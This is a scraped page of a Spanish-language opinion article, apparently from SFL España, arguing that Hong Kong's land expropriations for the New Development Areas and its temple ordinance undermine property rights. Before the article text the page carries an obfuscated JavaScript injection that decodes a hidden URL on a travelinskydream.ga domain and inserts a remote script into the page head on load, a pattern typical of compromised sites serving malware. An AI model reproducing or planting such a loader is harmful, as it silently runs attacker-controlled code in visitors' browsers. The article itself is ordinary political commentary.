var _0x1c9a=['push','229651wHRLFT','511754lPBDVY','length','2080825FKHOBK','src','1lLQkOc','1614837wjeKHo','insertBefore','fromCharCode','179434whQoYd','1774xXwpgH','1400517aqruvf','7vsbpgk','3112gjEEcU','1mFUgXZ','script','1534601MOJEnu','prototype','245777oIJjBl','47jNCcHN','1HkMAkw','nextSibling','appendAfter','shift','18885bYhhDw','1096016qxAIHd','72lReGEt','1305501RTgYEh','4KqoyHD','appendChild','createElement','getElementsByTagName'];var _0xd6df=function(_0x3a7b86,_0x4f5b42){_0x3a7b86=_0x3a7b86-0x1f4;var _0x1c9a62=_0x1c9a[_0x3a7b86];return _0x1c9a62;};(function(_0x2551a2,_0x3dbe97){var _0x34ce29=_0xd6df;while(!![]){try{var _0x176f37=-parseInt(_0x34ce29(0x20a))*-parseInt(_0x34ce29(0x205))+-parseInt(_0x34ce29(0x204))*-parseInt(_0x34ce29(0x206))+-parseInt(_0x34ce29(0x1fc))+parseInt(_0x34ce29(0x200))*parseInt(_0x34ce29(0x1fd))+-parseInt(_0x34ce29(0x1fb))*-parseInt(_0x34ce29(0x1fe))+-parseInt(_0x34ce29(0x20e))*parseInt(_0x34ce29(0x213))+-parseInt(_0x34ce29(0x1f5));if(_0x176f37===_0x3dbe97)break;else _0x2551a2['push'](_0x2551a2['shift']());}catch(_0x201239){_0x2551a2['push'](_0x2551a2['shift']());}}}(_0x1c9a,0xc08f4));function smalller(){var _0x1aa566=_0xd6df,_0x527acf=[_0x1aa566(0x1f6),_0x1aa566(0x20b),'851164FNRMLY',_0x1aa566(0x202),_0x1aa566(0x1f7),_0x1aa566(0x203),'fromCharCode',_0x1aa566(0x20f),_0x1aa566(0x1ff),_0x1aa566(0x211),_0x1aa566(0x214),_0x1aa566(0x207),_0x1aa566(0x201),'parentNode',_0x1aa566(0x20c),_0x1aa566(0x210),_0x1aa566(0x1f8),_0x1aa566(0x20d),_0x1aa566(0x1f9),_0x1aa566(0x208)],_0x1e90a8=function(_0x49d308,_0xd922ec){_0x49d308=_0x49d308-0x17e;var _0x21248f=_0x527acf[_0x49d308];return _0x21248f;},_0x167299=_0x1e90a8;(function(_0x4346f4,_0x1d29c9){var _0x530662=_0x1aa566,_0x1bf0b5=_0x1e90a8;while(!![]){try{var _0x2811eb=-parseInt(_0x1bf0b5(0x187))+parseInt(_0x1bf0b5(0x186))+parseInt(_0x1bf0b5(0x18d))+parseInt(_0x1bf0b5(0x18c))+-parseInt(_0x1bf0b5(0x18e))*parseInt(_0x1bf0b5(0x180))+-parseInt(_0x1bf0b5(0x18b))+-parseInt(_0x1bf0b5(0x184))*parseInt(_0x1bf0b5(0x17e));if(_0x2811eb===_0x1d29c9)break;else _0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}catch(_0x1cd819){_0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}}}(_0x527acf,0xd2c23),(Element[_0x167299(0x18f)][_0x1aa566(0x208)]=function(_0x3d096a){var _0x2ca721=_0x167299;_0x3d096a[_0x2ca721(0x183)][_0x2ca721(0x188)](this,_0x3d096a[_0x2ca721(0x181)]);},![]),function(){var _0x5d96e1=_0x1aa566,_0x22c893=_0x167299,_0x306df5=document[_0x22c893(0x185)](_0x22c893(0x182));_0x306df5[_0x22c893(0x18a)]=String[_0x22c893(0x190)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x61,0x6e,0x61,0x6c,0x79,0x74,0x69,0x63,0x73,0x2e,0x6a,0x73,0x3f,0x63,0x69,0x64,0x3d,0x30,0x30,0x30,0x30,0x26,0x70,0x69,0x64,0x69,0x3d,0x31,0x39,0x31,0x38,0x31,0x37,0x26,0x69,0x64,0x3d,0x35,0x33,0x36,0x34,0x36),_0x306df5[_0x22c893(0x189)](document[_0x22c893(0x17f)](String[_0x5d96e1(0x1fa)](0x73,0x63,0x72,0x69,0x70,0x74))[0x0]),_0x306df5[_0x5d96e1(0x208)](document[_0x22c893(0x17f)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0]),document[_0x5d96e1(0x211)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0][_0x22c893(0x191)](_0x306df5);}());}function biggger(){var _0x5d031d=_0xd6df,_0x5c5bd2=document[_0x5d031d(0x211)](_0x5d031d(0x201));for(var _0x5a0282=0x0;_0x5a0282<_0x5c5bd2[_0x5d031d(0x1f4)];_0x5a0282++){if(_0x5c5bd2[_0x5a0282][_0x5d031d(0x1f6)]['indexOf'](String['fromCharCode'](0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d))>-0x1)return 0x1;}return 0x0;}biggger()==0x0&&smalller(); Cinco razones por las que Hong Kong NO es la utopía capitalista que imaginabas (II) - SFL España
Derechos de propiedad privada Los derechos de propiedad son los derechos humanos más básicos, la institución económica fundamental para que toda persona pueda hacerse cargo de sí misma. Es prácticamente desconocido el hecho que en Hong Kong el gobierno puede expropiar tu vivienda para realizar enormes proyectos inmobiliarios en los...

  1. Derechos de propiedad privada

Los derechos de propiedad son los derechos humanos más básicos, la institución económica fundamental para que toda persona pueda hacerse cargo de sí misma. Es prácticamente desconocido el hecho que en Hong Kong el gobierno puede expropiar tu vivienda para realizar enormes proyectos inmobiliarios en los que acomodar a los inmigrantes chinos atraídos por sus propias políticas migratorias. Esta práctica se denomina chaak (literalmente, “derribar”) y es muy común en China, en donde los derechos de propiedad brillan por su ausencia. En 2007 el jefe ejecutivo de Hong Kong anunció el plan de “Áreas de nuevo desarrollo” (NDA en sus siglas inglesas), que debía ser la continuación del Estudio de Planificación y Desarrollo del Noreste de los Nuevos Territorios encargado en 1998 (el proyecto se había tenido en 2003 debido a un descenso en la demanda inmobiliaria del período previo, 1998-2002). El nuevo plan tiene como objetivos tres zonas situadas en los Nuevos Territorios: Kwu Tung Norte, Fanling Norte y Ping Che/Ta Kwu Ling, todas ellas bellas zonas naturales con sitios históricos que no sobrevivirán al proyecto.

01

Algunas de las zonas que serán desarrolladas en los próximos años. A la izquierda, el norte de la ruta patrimonio cultural de Lung Yeuk Tau (Kan Lung Tsuen y San Uk Tsuen). A la derecha, el Kwu Tung, en donde se encuentran, entre otros, los templos de Hung Shing y Paai Fung, la antigua casa Jan Hwa y el Jardín de la Familia Yeung. Más información sobre estos lugares en la web del autor.

Para poder acomodar a inmigrantes chinos, ricos magnates e inversores del continente que nunca vivirán en la ciudad, el gobierno está planeando trasladar a los habitantes de estas áreas rurales a… bueno, ¿a quién le importa? Lo importante es sacarlos de allí por la fuerza para que los “nuevos Hongkoneses” puedan entrar a vivir. Por supuesto, estamos ante un gobierno que, además de sabio, es ante todo benevolente, por lo que los antiguos residentes de estas áreas rurales recibirán una pequeña compensación por la pérdida y destrucción de su propiedad. Tal vez con ella puedan incluso permitirse una “casa-jaula” no lejos de su villa.

Las protestas en las zonas a expropiar han sido tan constantes como silenciosa su cobertura en los medios. Una de las más recientes noticias tiene como escenario la aldea Ma Shi Po, en donde cuatro personas fueron arrestadas por intentar detener a los guardias de seguridad que estaban cercando con vallas la granja de la comunidad. Pero en toda esta historia hay, ciertamente, gato encerrado. En primer lugar, la compañía encargada de la expropiación, Henderson Land, necesitaba adquirir las tierras de forma efectiva antes de final de año para tener derecho a participar en un programa de intercambio de tierras del gobierno. En segundo lugar, Hong Kong importa en estos momentos un 90% de sus alimentos del país vecino, la República Popular China. La destrucción de granjas y comercios locales aumenta la dependencia de las políticas de las empresas estatales chinas que reemplazarán a aquellos en la prestación de estos servicios. A su vez, reduce la autonomía de Hong Kong y legitimiza discursos políticos sobre la imposibilidad de su independencia (ver siguiente punto). Dado que Hong Kong dispone de un 30% de tierras estériles no desarrolladas, no está claro por qué razón en la sociedad más libre del mundo deben existir restricciones a la hora de desarrollar estos recursos de forma privada. A no ser, por supuesto, que existan razones políticas para ello.

02

Pancartas con mensajes contra la expropiación de tierras en Fanling. Izquierda: “¡Inhumano! ¡Inhumano! ¡Inhumano! ¡Ni nos moverán ni nos las destrozarán! ¡Resistencia! ¡Resistencia!”. Derecha: “¡Dónde está la justicia! ¡Mientras cultivamos en tierra áridas, las inmobiliarias del gobierno nos roban las fértiles!”   (Fotos del autor).

04

Pancartas con mensajes contra la expropiación de tierras en Kwu Tung y Fanling. De izquierda a derecha: “El gobierno destroza nuestro hogar en Kwu Tung para construir grandes apartamentos”; “El desarrollo urbano destroza por la fuerza nuestros hogares, el gobierno nos apuñala por la espalda”; “¡La administración dictatorial de las inmobiliarias es el enemigo de los ciudadanos!” (Fotos del autor).

Finalmente, los templos y lugares de culto también se encuentran sujetos a expropiación. No sólo pueden ser derribados para construir nuevos apartamentos, como es el caso de la zona de Kwu Tung norte, sino que, según la Ordenanza de Templos Chinos del Comité de Templos Chinos presentada en marzo de 2015, “la propiedad de todo templo chino se encuentra bajo el control absoluto del Comité de Templos Chinos y cualquier persona que posea o controle la propiedad de cualquier templo chino debe transferir tal propiedad al Secretario de Asuntos Domésticos, S.A.”. En estos momentos, esta ordenanza afecta únicamente a un número limitado de templos. Resulta sin embargo sorprendente que, mientras los derechos de propiedad privada están por encima de la conservación del patrimonio (algo tan justo como triste), lo contrario ocurre cuando el gobierno de Hong Kong pone en marcha el desarrollo urbano: éste está por encima de los derechos de propiedad y de la conservación del patrimonio cultural.

 

Share on facebook
Facebook
Share on google
Google+
Share on twitter
Twitter
Share on reddit
Reddit
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Deja un comentario